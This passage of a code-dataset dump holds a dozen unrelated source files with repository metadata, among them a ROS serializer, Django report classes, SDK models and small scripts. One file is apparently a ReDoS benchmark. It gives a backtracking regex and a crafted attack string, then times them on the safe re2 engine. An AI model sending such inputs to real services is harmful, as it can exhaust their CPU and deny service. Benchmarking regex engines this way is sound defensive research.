    Same wire layout as :meth:`serialize`, but the float64 arrays are
    written directly from the numpy buffers.
    """
    try:
        _x = self
        buff.write(_struct_3I.pack(_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs))
        _x = self.header.frame_id
        length = len(_x)
        if python3 or type(_x) == unicode:
            _x = _x.encode('utf-8')
            length = len(_x)
        if python3:
            buff.write(struct.pack('<I%sB'%length, length, *_x))
        else:
            buff.write(struct.pack('<I%ss'%length, length, _x))
        length = len(self.q.data)
        buff.write(_struct_I.pack(length))
        pattern = '<%sd'%length
        # NOTE(review): ndarray.tostring() is deprecated in modern numpy in
        # favour of tobytes(); generated code kept as-is.
        buff.write(self.q.data.tostring())
        length = len(self.dq.data)
        buff.write(_struct_I.pack(length))
        pattern = '<%sd'%length
        buff.write(self.dq.data.tostring())
        _x = self
        buff.write(_struct_3B.pack(_x.is_moving, _x.is_colliding, _x.e_stopped))
    except struct.error as se: self._check_types(struct.error("%s: '%s' when writing '%s'" % (type(se), str(se), str(locals().get('_x', self)))))
    except TypeError as te: self._check_types(ValueError("%s: '%s' when writing '%s'" % (type(te), str(te), str(locals().get('_x', self)))))
def deserialize_numpy(self, str, numpy):
    """
    unpack serialized message in str into this message instance using numpy for array types
    :param str: byte array of serialized message, ``str``
    :param numpy: numpy python module

    Same format as :meth:`deserialize`; the float64 arrays are produced
    as numpy views via ``numpy.frombuffer``.
    """
    try:
        if self.header is None:
            self.header = std_msgs.msg.Header()
        if self.q is None:
            self.q = caros_common_msgs.msg.Q()
        if self.dq is None:
            self.dq = caros_common_msgs.msg.Q()
        end = 0
        _x = self
        start = end
        end += 12
        (_x.header.seq, _x.header.stamp.secs, _x.header.stamp.nsecs,) = _struct_3I.unpack(str[start:end])
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        start = end
        end += length
        if python3:
            self.header.frame_id = str[start:end].decode('utf-8')
        else:
            self.header.frame_id = str[start:end]
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        pattern = '<%sd'%length
        start = end
        end += struct.calcsize(pattern)
        self.q.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
        start = end
        end += 4
        (length,) = _struct_I.unpack(str[start:end])
        pattern = '<%sd'%length
        start = end
        end += struct.calcsize(pattern)
        self.dq.data = numpy.frombuffer(str[start:end], dtype=numpy.float64, count=length)
        _x = self
        start = end
        end += 3
        (_x.is_moving, _x.is_colliding, _x.e_stopped,) = _struct_3B.unpack(str[start:end])
        self.is_moving = bool(self.is_moving)
        self.is_colliding = bool(self.is_colliding)
        self.e_stopped = bool(self.e_stopped)
        return self
    except struct.error as e:
        raise genpy.DeserializationError(e) #most likely buffer underfill
# Pre-compiled struct formats shared by the (de)serialization methods above
# (little-endian: 'I' = uint32, 'B' = uint8).
_struct_I = genpy.struct_I
_struct_3B = struct.Struct("<3B")
_struct_3I = struct.Struct("<3I")
| [
"kerat12@student.sdu.dk"
] | kerat12@student.sdu.dk |
ea2d61ae0c1e7e0201572dfe99c9e2b60c194f4c | 0adb68bbf576340c8ba1d9d3c07320ab3bfdb95e | /regexlib/python_re2_test_file/regexlib_8042.py | 7f3731ea0b2889199ad4f7f644c3eb4d522ba376 | [
"MIT"
] | permissive | agentjacker/ReDoS-Benchmarks | c7d6633a3b77d9e29e0ee2db98d5dfb60cde91c6 | f5b5094d835649e957bf3fec6b8bd4f6efdb35fc | refs/heads/main | 2023-05-10T13:57:48.491045 | 2021-05-21T11:19:39 | 2021-05-21T11:19:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 544 | py | # 8042
# [0-9]*[-| ][0-9]*[-| ][0-9]*[-| ][0-9]*[-| ][0-9]*
# POLYNOMIAL
# nums:5
# POLYNOMIAL AttackString:""+"0"*20000+"!1 _SLQ_1"

# ReDoS benchmark: times the polynomially-backtracking pattern above
# against attack strings of growing length.  Runs on the re2 engine
# (linear-time matching), so timings here serve as the safe baseline.
import re2 as re
from time import perf_counter
regex = """[0-9]*[-| ][0-9]*[-| ][0-9]*[-| ][0-9]*[-| ][0-9]*"""
REGEX = re.compile(regex)  # compile once, outside the timing loop
for i in range(0, 150000):
    ATTACK = "" + "0" * i * 10000 + "!1 _SLQ_1"
    LEN = len(ATTACK)  # NOTE(review): unused; kept for parity with sibling benchmark files
    BEGIN = perf_counter()
    m = REGEX.search(ATTACK)
    # m = REGEX.match(ATTACK)
    DURATION = perf_counter() - BEGIN
    print(f"{i *10000}: took {DURATION} seconds!")
"liyt@ios.ac.cn"
] | liyt@ios.ac.cn |
0542df0613cdfe3e156d53aa7c489a965abbc72e | 3121b64e95d022b12585348070dff048ae879f68 | /render/normalised_ply.py | 39726f5e431102d53b395b35aa7b40c26fb8c952 | [
"MIT"
] | permissive | lt6253090/OcCo | 082d1e5371064c70f9185d9425ea4318539c1785 | 5936a6fe099fe0b5aa5da47e8ba828a72b3adcbf | refs/heads/master | 2022-11-26T14:19:17.070920 | 2020-08-03T13:52:21 | 2020-08-03T13:52:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 849 | py | # Copyright (c) 2020. Hanchen Wang, hw501@cam.ac.uk
import os, open3d, numpy as np

# Index file listing every normalised model written below.
# NOTE(review): opened at import time and never closed explicitly;
# relies on interpreter exit to flush -- consider a context manager.
File_ = open('ModelNet_flist_short.txt', 'w')

if __name__ == "__main__":
    root_dir = "../data/ModelNet_subset/"
    for root, dirs, files in os.walk(root_dir, topdown=False):
        for file in files:
            if '.ply' in file:
                # Center each mesh at the origin, scale it down, and save
                # as a *_normalised.obj next to the source .ply.
                amesh = open3d.io.read_triangle_mesh(os.path.join(root, file))
                out_file_name = os.path.join(root, file).replace('.ply', '_normalised.obj')
                center = amesh.get_center()
                amesh.translate(-center)
                # maxR = largest vertex distance from the origin
                maxR = (np.asarray(amesh.vertices)**2).sum(axis=1).max()**(1/2)
                # we found divided by (2*maxR) has best rendered visualisation results
                amesh.scale(1/(2*maxR))
                open3d.io.write_triangle_mesh(out_file_name, amesh)
                File_.writelines(out_file_name.replace('.obj', '').replace(root_dir, '') + '\n')
                print(out_file_name)
| [
"hc.wang96@gmail.com"
] | hc.wang96@gmail.com |
10eb4d49285661fe5c622e13b644168cca0601b2 | 56ca0c81e6f8f984737f57c43ad8d44a84f0e6cf | /src/ewaluacja2021/xlsy.py | 4dfb33df91b55d730ce55579e99c89234071e548 | [
"MIT"
] | permissive | iplweb/bpp | c40f64c78c0da9f21c1bd5cf35d56274a491f840 | a3d36a8d76733a479e6b580ba6ea57034574e14a | refs/heads/dev | 2023-08-09T22:10:49.509079 | 2023-07-25T04:55:54 | 2023-07-25T04:55:54 | 87,017,024 | 2 | 0 | NOASSERTION | 2023-03-04T04:02:36 | 2017-04-02T21:22:20 | Python | UTF-8 | Python | false | false | 7,162 | py | import os
from decimal import Decimal
import openpyxl
from django.db.models import Sum, Value
from ewaluacja2021.const import LATA_2017_2018, LATA_2019_2021
from ewaluacja2021.reports import get_data_for_report, write_data_to_report
from ewaluacja2021.util import autor2fn, output_table_to_xlsx
from bpp.models import Autor
class WyjsciowyXLSX:
    """Base class for an evaluation output ("wyjsciowy") XLSX workbook.

    Subclasses override :meth:`metka` to emit their metadata header rows;
    :meth:`zrob` drives the whole flow: header, blank row, data table,
    save into *katalog_wyjsciowy* (the output directory).
    """

    def __init__(self, title, rekordy, dane, katalog_wyjsciowy):
        # title: worksheet/file title; rekordy: queryset of records to
        # report; dane: dict of precomputed summary data;
        # katalog_wyjsciowy: output directory path.
        self.title = title
        self.rekordy = rekordy
        self.dane = dane
        self.katalog_wyjsciowy = katalog_wyjsciowy
        self.create_workbook()

    def create_workbook(self):
        self.wb = openpyxl.Workbook()

    def initialize_worksheet(self):
        self.ws = self.wb.active
        if self.title:
            # Excel caps worksheet names at 31 characters.
            self.ws.title = self.title[:31]

    def tabelka(self):
        # "tabelka" = table: write the tabular report body.
        write_data_to_report(self.ws, get_data_for_report(self.rekordy))

    def get_output_name(self):
        return f"{self.title}.xlsx"

    def zapisz(self):
        # "zapisz" = save.
        self.wb.save(os.path.join(self.katalog_wyjsciowy, self.get_output_name()))

    def metka(self):
        # "metka" = label/metadata header; must be provided by subclasses.
        raise NotImplementedError()

    def zrob(self):
        # "zrob" = do: build and save the complete workbook.
        self.initialize_worksheet()
        self.metka()
        self.ws.append([])
        self.tabelka()
        self.zapisz()
class CalosciowyXLSX(WyjsciowyXLSX):
    """Overall ("calosciowy") report: discipline-wide parameters and sums.

    The header lists the evaluation parameters (N counts, year-range slot
    sums) followed by slot/PKDaut totals aggregated over all records
    flagged ``do_ewaluacji`` (selected for evaluation).
    """

    def metka(self):
        self.ws.append(
            [
                "Parametry raportu 3N",
                "raport całościowy",
            ]
        )
        self.ws.append(["Stan na dzień/moment", self.dane["ostatnia_zmiana"]])
        self.ws.append(["Dyscyplina", self.dane["dyscyplina"]])
        self.ws.append(["Liczba N", self.dane["liczba_n"]])
        self.ws.append(["Liczba 0.8N", self.dane["liczba_0_8_n"]])
        self.ws.append(["Liczba 2.2N", self.dane["liczba_2_2_n"]])
        self.ws.append(["Liczba 3*N", Decimal("3.0") * self.dane["liczba_n"]])
        self.ws.append(
            [
                "Suma slotów za lata 2017-2018",
                self.dane["sumy_slotow"][LATA_2017_2018],
            ]
        )
        self.ws.append(
            [
                "Suma slotów za lata 2019-2021",
                self.dane["sumy_slotow"][LATA_2019_2021],
            ]
        )
        # Aggregate slots and author points over evaluation-selected records.
        sumy = self.rekordy.filter(do_ewaluacji=True).aggregate(
            suma_slot=Sum("slot"), suma_pkdaut=Sum("pkdaut")
        )
        self.ws.append(["Zebrana suma slotów za wszystkie prace", sumy["suma_slot"]])
        self.ws.append(["Zebrana suma PKDAut za wszystkie prace", sumy["suma_pkdaut"]])
class WypelnienieXLSX(CalosciowyXLSX):
    """Per-author fill-rate ("wypelnienie") report.

    For each author appearing in the record set, reports how much of
    their maximum slot allowance (overall and for monographs) was used,
    plus the share of their PKDaut points that were reported.
    """

    def get_data_for_report(self):
        # One output row per distinct author in the record set.
        id_autorow = self.rekordy.values_list("autor_id", flat=True).distinct()
        for autor in Autor.objects.filter(pk__in=id_autorow):
            # NOTE(review): .get() returns None for an author missing from
            # these dicts, which would make the divisions below raise
            # TypeError -- confirm the inputs always cover every author.
            maks_pkt_aut_calosc = self.dane["maks_pkt_aut_calosc"].get(str(autor.pk))
            maks_pkt_aut_monografie = self.dane["maks_pkt_aut_monografie"].get(
                str(autor.pk)
            )
            # Totals over records selected for evaluation for this author.
            sumy = self.rekordy.filter(do_ewaluacji=True, autor_id=autor.pk).aggregate(
                suma_slot=Sum("slot"),
                suma_pkdaut=Sum("pkdaut"),
            )
            # Monographs only ("monografia" flag stored as 't').
            sumy_monografie = self.rekordy.filter(
                do_ewaluacji=True, monografia=Value("t"), autor_id=autor.pk
            ).aggregate(
                suma_slot=Sum("slot"),
            )
            # All of the author's records, selected or not.
            sumy_wszystkie = self.rekordy.filter(autor_id=autor.pk).aggregate(
                suma_pkdaut=Sum("pkdaut"),
            )
            yield [
                str(autor.id),
                autor.nazwisko + " " + autor.imiona,
                maks_pkt_aut_calosc,
                sumy["suma_slot"] or 0,
                (sumy["suma_slot"] or 0) / maks_pkt_aut_calosc,
                maks_pkt_aut_monografie,
                (sumy_monografie["suma_slot"] or 0),
                # NOTE(review): the monograph percentage divides by the
                # overall maximum, not maks_pkt_aut_monografie -- confirm
                # this is intended.
                (sumy_monografie["suma_slot"] or 0) / maks_pkt_aut_calosc,
                sumy["suma_pkdaut"],
                sumy_wszystkie["suma_pkdaut"],
                (sumy["suma_pkdaut"] or 0) / (sumy_wszystkie["suma_pkdaut"] or 1),
            ]

    def write_data_to_report(self, ws: openpyxl.worksheet.worksheet.Worksheet, data):
        # Column order must match the row layout yielded above.
        output_table_to_xlsx(
            ws,
            "Przeszly",
            [
                # "ID elementu",
                "ID autora",
                "Nazwisko i imię",
                #
                "Maksymalna suma udziałów",
                "Sprawozdana suma udziałów",
                "Procent sprawozdanej sumy udziałów",
                #
                "Maksymalna suma udziałów - monografie",
                "Sprawozdana suma udziałów - monografie",
                "Procent sprawozdanej sumy udziałów - monografie",
                #
                "PKDaut prac sprawozdanych",
                "PKDaut wszystkich prac",
                "Procent PKDaut sprawozdanych",
            ],
            data,
            first_column_url="https://{site_name}/bpp/autor/",
            column_widths={
                "A": 10,
                "B": 14,
                "C": 14,
                "D": 14,
                "E": 14,
                "F": 14,
                "G": 14,
                "H": 14,
                "I": 14,
                "J": 14,
                "K": 14,
                "L": 14,
            },
            autor_column_url=1,
        )

    def tabelka(self):
        # Overrides the base table with the per-author generator above.
        dane = self.get_data_for_report()
        self.write_data_to_report(self.ws, dane)
class AutorskiXLSX(WyjsciowyXLSX):
    """Single-author ("autorski") extract of the 3N report.

    The caller is expected to pass ``rekordy`` already filtered to the
    given *autor*; the header compares the author's maximum slot
    allowances with the sums actually collected.
    """

    def __init__(self, autor, title, rekordy, dane, katalog_wyjsciowy):
        super().__init__(
            title=title, rekordy=rekordy, dane=dane, katalog_wyjsciowy=katalog_wyjsciowy
        )
        self.autor = autor

    def metka(self):
        self.ws.append(
            [
                "Parametry raportu 3N",
                "wyciąg dla pojedynczego autora",
            ]
        )
        self.ws.append(["Stan na dzień/moment", self.dane["ostatnia_zmiana"]])
        self.ws.append(["Dyscyplina", self.dane["dyscyplina"]])
        # NOTE(review): "wszytkie" below is a typo for "wszystkie" in the
        # spreadsheet label; left untouched here (runtime string).
        self.ws.append(
            [
                "Maks. suma slotów za wszytkie prace",
                self.dane["maks_pkt_aut_calosc"].get(str(self.autor.pk)),
            ]
        )
        sumy = self.rekordy.filter(do_ewaluacji=True).aggregate(
            suma_slot=Sum("slot"), suma_pkdaut=Sum("pkdaut")
        )
        self.ws.append(["Zebrana suma slotów za wszystkie prace", sumy["suma_slot"]])
        self.ws.append(["Zebrana suma PKDAut za wszystkie prace", sumy["suma_pkdaut"]])
        self.ws.append(
            [
                "Maks. suma slotów za monografie",
                self.dane["maks_pkt_aut_monografie"].get(str(self.autor.pk)),
            ]
        )
        # Same aggregation restricted to monographs.
        sumy = self.rekordy.filter(do_ewaluacji=True, monografia=Value("t")).aggregate(
            suma_slot=Sum("slot"), suma_pkdaut=Sum("pkdaut")
        )
        self.ws.append(["Zebrana suma slotów za monografie", sumy["suma_slot"]])
        self.ws.append(["Zebrana suma PKDAut za monografie", sumy["suma_pkdaut"]])

    def get_output_name(self):
        # File name is derived from the author, not from the title.
        return autor2fn(self.autor) + ".xlsx"
| [
"michal.dtz@gmail.com"
] | michal.dtz@gmail.com |
e9b067b88c153881f73dfe6f385f65c0b6b2d567 | c34380b64145b4ce26df9b27c34139d08de27515 | /findSquare_1.py | 6691dfa3d4ddfc6a058b6d9f149dcc8a10a5ef7b | [] | no_license | codeandrew/python-algorithms | 531bc1574700cb7d822904f1e1ead9a596a85d29 | c71b0941f14825fcaa3fbb1429365ca1f28a3018 | refs/heads/master | 2023-04-28T23:56:01.283434 | 2023-04-05T03:06:22 | 2023-04-05T03:06:22 | 169,078,505 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 181 | py | import math
def is_square(n):
    """Return True when *n* is a perfect square (0, 1, 4, 9, 16, ...).

    Negative and non-numeric inputs return False instead of raising.

    The original used ``math.sqrt`` and a float modulo, which loses
    precision for large integers; ``math.isqrt`` is exact for any size.
    """
    try:
        if n < 0:
            return False
        root = math.isqrt(int(n))
        # Compare against the original n so non-integer floats (e.g. 2.5)
        # are rejected rather than silently truncated.
        return root * root == n
    except (TypeError, ValueError):
        return False
| [
"jeanandrewfuentes@gmail.com"
] | jeanandrewfuentes@gmail.com |
47f5d7568c984524b2c898478013521badca8f55 | e4ec5b6cf3cfe2568ef0b5654c019e398b4ecc67 | /azure-cli/2.0.18/libexec/lib/python3.6/site-packages/azure/mgmt/network/v2016_09_01/models/frontend_ip_configuration.py | 29047c8dab7e49461129f986c35db4e775edb14a | [] | no_license | EnjoyLifeFund/macHighSierra-cellars | 59051e496ed0e68d14e0d5d91367a2c92c95e1fb | 49a477d42f081e52f4c5bdd39535156a2df52d09 | refs/heads/master | 2022-12-25T19:28:29.992466 | 2017-10-10T13:00:08 | 2017-10-10T13:00:08 | 96,081,471 | 3 | 1 | null | 2022-12-17T02:26:21 | 2017-07-03T07:17:34 | null | UTF-8 | Python | false | false | 4,730 | py | # coding=utf-8
# --------------------------------------------------------------------------
# Copyright (c) Microsoft Corporation. All rights reserved.
# Licensed under the MIT License. See License.txt in the project root for
# license information.
#
# Code generated by Microsoft (R) AutoRest Code Generator.
# Changes may cause incorrect behavior and will be lost if the code is
# regenerated.
# --------------------------------------------------------------------------
from .sub_resource import SubResource
class FrontendIPConfiguration(SubResource):
    """Frontend IP address of the load balancer.

    The collection attributes (``inbound_nat_rules``, ``inbound_nat_pools``,
    ``outbound_nat_rules``, ``load_balancing_rules``) are populated only by
    the server and are ignored when sending a request.

    :param id: Resource ID.
    :param private_ip_address: The private IP address of the IP
     configuration.
    :param private_ip_allocation_method: The private IP allocation method;
     possible values are 'Static' and 'Dynamic'.
    :param subnet: The reference of the subnet resource.
    :param public_ip_address: The reference of the Public IP resource.
    :param provisioning_state: Provisioning state of the public IP
     resource; possible values are 'Updating', 'Deleting', and 'Failed'.
    :param name: The name of the resource, unique within a resource group.
    :param etag: A unique read-only string that changes whenever the
     resource is updated.
    """

    _validation = {
        'inbound_nat_rules': {'readonly': True},
        'inbound_nat_pools': {'readonly': True},
        'outbound_nat_rules': {'readonly': True},
        'load_balancing_rules': {'readonly': True},
    }

    _attribute_map = {
        'id': {'key': 'id', 'type': 'str'},
        'inbound_nat_rules': {'key': 'properties.inboundNatRules', 'type': '[SubResource]'},
        'inbound_nat_pools': {'key': 'properties.inboundNatPools', 'type': '[SubResource]'},
        'outbound_nat_rules': {'key': 'properties.outboundNatRules', 'type': '[SubResource]'},
        'load_balancing_rules': {'key': 'properties.loadBalancingRules', 'type': '[SubResource]'},
        'private_ip_address': {'key': 'properties.privateIPAddress', 'type': 'str'},
        'private_ip_allocation_method': {'key': 'properties.privateIPAllocationMethod', 'type': 'str'},
        'subnet': {'key': 'properties.subnet', 'type': 'Subnet'},
        'public_ip_address': {'key': 'properties.publicIPAddress', 'type': 'PublicIPAddress'},
        'provisioning_state': {'key': 'properties.provisioningState', 'type': 'str'},
        'name': {'key': 'name', 'type': 'str'},
        'etag': {'key': 'etag', 'type': 'str'},
    }

    def __init__(self, id=None, private_ip_address=None, private_ip_allocation_method=None, subnet=None, public_ip_address=None, provisioning_state=None, name=None, etag=None):
        super(FrontendIPConfiguration, self).__init__(id=id)
        # Server-populated, read-only collections all start out unset.
        for server_populated in ('inbound_nat_rules', 'inbound_nat_pools',
                                 'outbound_nat_rules', 'load_balancing_rules'):
            setattr(self, server_populated, None)
        self.private_ip_address = private_ip_address
        self.private_ip_allocation_method = private_ip_allocation_method
        self.subnet = subnet
        self.public_ip_address = public_ip_address
        self.provisioning_state = provisioning_state
        self.name = name
        self.etag = etag
| [
"Raliclo@gmail.com"
] | Raliclo@gmail.com |
b30cf9c3fdd4d322be96bee80da321a1ad93e8f1 | d2c4934325f5ddd567963e7bd2bdc0673f92bc40 | /tests/artificial/transf_Fisher/trend_MovingMedian/cycle_5/ar_/test_artificial_32_Fisher_MovingMedian_5__0.py | 9e5e9d5395d5905e2f44be0c8fe90fe178f72318 | [
"BSD-3-Clause",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | jmabry/pyaf | 797acdd585842474ff4ae1d9db5606877252d9b8 | afbc15a851a2445a7824bf255af612dc429265af | refs/heads/master | 2020-03-20T02:14:12.597970 | 2018-12-17T22:08:11 | 2018-12-17T22:08:11 | 137,104,552 | 0 | 0 | BSD-3-Clause | 2018-12-17T22:08:12 | 2018-06-12T17:15:43 | Python | UTF-8 | Python | false | false | 267 | py | import pyaf.Bench.TS_datasets as tsds
import pyaf.tests.artificial.process_artificial_dataset as art

# Generated test: artificial daily (FREQ='D') series of length N=32 with a
# MovingMedian trend, cycle length 5, Fisher transform, no noise
# (sigma=0.0), no exogenous variables and AR order 0.
art.process_dataset(N = 32 , FREQ = 'D', seed = 0, trendtype = "MovingMedian", cycle_length = 5, transform = "Fisher", sigma = 0.0, exog_count = 0, ar_order = 0);
"antoine.carme@laposte.net"
] | antoine.carme@laposte.net |
eb5df28853640bcb013ac32bdbc48d0220d3c72f | 56ba30f470ddf70d7705d847c0ab2f5f894739e7 | /_src/stage3/break_time.py | 854072eda0ac8a1499473b04f35fc3560197a767 | [] | no_license | chhikara0007/intro-to-programming | c989fd5892ed3fcb4c559e278a72a2d931e7c9e3 | 6a93f43c225b146c6874ee7821c25e1f61f821b0 | refs/heads/master | 2021-01-02T08:13:07.238853 | 2016-10-04T14:44:36 | 2016-10-04T14:44:36 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 379 | py | import time
import webbrowser
import random

# "Take a break" reminder: after each interval, open one randomly chosen
# site from web_list, for a fixed number of breaks.
total_breaks = 3
web_list = ["http://www.google.com", "http://twitter.com",
            "http://www.youtube.com/watch?v=dQw4w9WgXcQ"]

print("This program started on "+time.ctime())
for _ in range(total_breaks):
    time.sleep(5)
    webbrowser.open(random.choice(web_list))
"dadac123@gmail.com"
] | dadac123@gmail.com |
1679dfc05c5e136eb693e371474a8d6c679e4eb8 | 46732d613208ee4096fbbd3fd74f22146471d1ce | /wangyiyun_songs&lyrics/all_singer歌手情绪分析/陈粒/sentiments_test.py | 0eaf219349b004a76550efc38b24981a66396e3d | [] | no_license | cassieeric/python_crawler | 7cb02f612382801ae024e2cee70e0c2bcdba927c | 6d2b4db3d34183d729f6fd30555c6d6f04514260 | refs/heads/master | 2022-11-30T20:30:50.031960 | 2022-11-27T02:53:22 | 2022-11-27T02:53:22 | 118,204,154 | 322 | 283 | null | 2022-12-21T09:33:08 | 2018-01-20T03:17:14 | HTML | UTF-8 | Python | false | false | 867 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
from snownlp import SnowNLP
# 积极/消极
# print(s.sentiments) # 0.9769551298267365 positive的概率
def get_word():
    """Return the list of keywords, one per line of the keyword file.

    Fixes the original read loop, which consumed one line before entering
    the loop (silently dropping the first keyword) and appended the empty
    string returned at EOF as a trailing element.
    """
    with open("陈粒歌词关键字.txt", encoding="utf-8") as f:
        return [line.strip('\r\n') for line in f]
def get_sentiment(word):
    # SnowNLP's ``sentiments`` score is the probability that the text is
    # positive (1.0 = positive, 0.0 = negative); printed, not returned.
    text = u'{}'.format(word)
    s = SnowNLP(text)
    print(s.sentiments)
if __name__ == '__main__':
    # Score every keyword extracted from the lyrics keyword file.
    words = get_word()
    for word in words:
        get_sentiment(word)
    # Earlier experiment kept for reference: score a literal snippet and
    # append the result to a file instead of printing it.
    # text = u'''
    # 也许
    # '''
    # s = SnowNLP(text)
    # print(s.sentiments)
    # with open('lyric_sentiments.txt', 'a', encoding='utf-8') as fp:
    #     fp.write(str(s.sentiments)+'\n')
    # print('happy end')
| [
"noreply@github.com"
] | cassieeric.noreply@github.com |
d47e989a1e6cd0df97c8b0b1cff955d999fdb136 | abfff8ab3162f7003b51d3fdcc7897684d2d4e54 | /unicode.py | 1562ddfe3bc2f669b166f9b3b02d019d3f409711 | [] | no_license | RedKnite5/Junk | 972dc24c99fe30400ab35e77bb4b69abe9076190 | 93b5bb4b6138518724528770cf56ea1df10e95b4 | refs/heads/master | 2023-04-10T07:25:14.968070 | 2023-04-04T04:19:42 | 2023-04-04T04:19:42 | 143,909,118 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 229 | py | import io
# Dump printable ASCII, then a large slice of the Unicode range, to a
# UTF-8 file.  UTF-8 can encode every code point except the surrogate
# block U+D800-U+DFFF, so skip that range explicitly instead of catching
# UnicodeEncodeError once per character.
with io.open("unicode.txt", "w+", encoding="utf8") as file:
    # printable ASCII (U+0020..U+007E) written in one bulk call
    file.write("".join(map(chr, range(32, 127))))
    for i in range(161, 130_000):
        if 0xD800 <= i <= 0xDFFF:  # unencodable surrogates
            continue
        file.write(chr(i))
| [
"mr.awesome10000@gmail.com"
] | mr.awesome10000@gmail.com |
71511da2fd63661ffd2addee0f4b082d184b1312 | 187a6558f3c7cb6234164677a2bda2e73c26eaaf | /jdcloud_sdk/services/cloudsign/apis/SaveMultiEvidenceRequest.py | bb03fd81acfbacb5edb45efe9f8045287987e3a4 | [
"Apache-2.0"
] | permissive | jdcloud-api/jdcloud-sdk-python | 4d2db584acc2620b7a866af82d21658cdd7cc227 | 3d1c50ed9117304d3b77a21babe899f939ae91cd | refs/heads/master | 2023-09-04T02:51:08.335168 | 2023-08-30T12:00:25 | 2023-08-30T12:00:25 | 126,276,169 | 18 | 36 | Apache-2.0 | 2023-09-07T06:54:49 | 2018-03-22T03:47:02 | Python | UTF-8 | Python | false | false | 2,364 | py | # coding=utf8
# Copyright 2018 JDCLOUD.COM
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
# NOTE: This class is auto generated by the jdcloud code generator program.
from jdcloud_sdk.core.jdcloudrequest import JDCloudRequest
class SaveMultiEvidenceRequest(JDCloudRequest):
    """
    Multi evidence-chain deposit API (stores a batch of evidence records).
    """

    def __init__(self, parameters, header=None, version="v1"):
        super(SaveMultiEvidenceRequest, self).__init__(
            '/evidence:evidenceMultisave', 'POST', header, version)
        self.parameters = parameters
class SaveMultiEvidenceParameters(object):
    """Parameter holder for :class:`SaveMultiEvidenceRequest`.

    Required fields are constructor arguments; optional fields default to
    None and are populated through the generated ``set*`` methods.
    """

    def __init__(self,businessId, file, ):
        """
        :param businessId: Business serial number
        :param file: Base64 of the evidence-data JSON string
        """
        self.businessId = businessId
        self.file = file
        self.businessCode = None
        self.lender = None
        self.messageId = None
        self.evidenceType = None
        self.messageDate = None

    def setBusinessCode(self, businessCode):
        """
        :param businessCode: (Optional) Evidence-chain code
        """
        self.businessCode = businessCode

    def setLender(self, lender):
        """
        :param lender: (Optional) Funder info (for loans pass: ZY; for bills pass PJ_SHOUXIN -- credit line, PJ_JIEKUAN -- loan)
        """
        self.lender = lender

    def setMessageId(self, messageId):
        """
        :param messageId: (Optional) Request serial number
        """
        self.messageId = messageId

    def setEvidenceType(self, evidenceType):
        """
        :param evidenceType: (Optional) Business type (JIEQIAN -- borrowing; PIAOJU -- bills)
        """
        self.evidenceType = evidenceType

    def setMessageDate(self, messageDate):
        """
        :param messageDate: (Optional) Request time
        """
        self.messageDate = messageDate
| [
"jdcloud-api@jd.com"
] | jdcloud-api@jd.com |
763df4380182d72f1502e248f2df77a2e82f2563 | 69eb40f099dcc0ea326972ff63db1d4fd131641a | /test_upkern/test_fixtures/test_sources.py | 29cb9c77be4569f6d5831cd4e236626b66b79ad1 | [] | no_license | alunduil/upkern | 4bcc1485629fad8a0ab1c613f71b7ebc3ef9038e | 23d4a98077bc18a229425a3f53dedd89ef5356fd | refs/heads/master | 2021-01-21T00:18:03.646111 | 2014-01-15T03:06:53 | 2014-01-15T03:06:53 | 1,007,705 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,481 | py | # Copyright (C) 2014 by Alex Brandt <alunduil@alunduil.com>
#
# upkern is freely distributable under the terms of an MIT-style license.
# See COPYING or http://www.opensource.org/licenses/mit-license.php.
# Fixture data for the sources tests: each entry describes one kernel
# sources package plus the file/directory names upkern should derive from
# it, and the sibling sources/configs present on the simulated system.
SOURCES = {}

SOURCES['correct'] = []

# Default case: name is None, so the newest installed sources
# (gentoo-sources-3.12.6) should be selected.
SOURCES['correct'].append(
        {
            'name': None,
            'directory_name': 'linux-3.12.6-gentoo',
            'package_name': '=sys-kernel/gentoo-sources-3.12.6',
            'binary_name': 'bzImage-3.12.6-gentoo',
            'configuration_name': 'config-3.12.6-gentoo',
            'system_map_name': 'System.map-3.12.6-gentoo',
            'kernel_index': 3012006000,
            'kernel_suffix': '-3.12.6-gentoo',
            'portage_configuration': { 'MAKEOPTS': '-j5' },
            'source_directories': [
                'linux-3.12.6-gentoo',
                'linux-3.12.5-gentoo',
                'linux-3.10.7-gentoo',
            ],
            'configuration_files': [
                'config-3.12.6-gentoo',
                'config-3.12.5-gentoo',
                'config-3.10.7-gentoo',
            ],
            'package_names': [
                'sys-kernel/gentoo-sources-3.12.6',
                'sys-kernel/gentoo-sources-3.12.5',
                'sys-kernel/gentoo-sources-3.10.7',
            ],
        })

# Fully-qualified package name requesting the same (newest) sources.
SOURCES['correct'].append(
        {
            'name': 'sys-kernel/gentoo-sources-3.12.6',
            'directory_name': 'linux-3.12.6-gentoo',
            'package_name': '=sys-kernel/gentoo-sources-3.12.6',
            'binary_name': 'bzImage-3.12.6-gentoo',
            'configuration_name': 'config-3.12.6-gentoo',
            'system_map_name': 'System.map-3.12.6-gentoo',
            'kernel_index': 3012006000,
            'kernel_suffix': '-3.12.6-gentoo',
            'portage_configuration': { 'MAKEOPTS': '-j5' },
            'source_directories': [
                'linux-3.12.6-gentoo',
                'linux-3.12.5-gentoo',
                'linux-3.10.7-gentoo',
            ],
            'configuration_files': [
                'config-3.12.6-gentoo',
                'config-3.12.5-gentoo',
                'config-3.10.7-gentoo',
            ],
            'package_names': [
                'sys-kernel/gentoo-sources-3.12.6',
                'sys-kernel/gentoo-sources-3.12.5',
                'sys-kernel/gentoo-sources-3.10.7',
            ],
        })

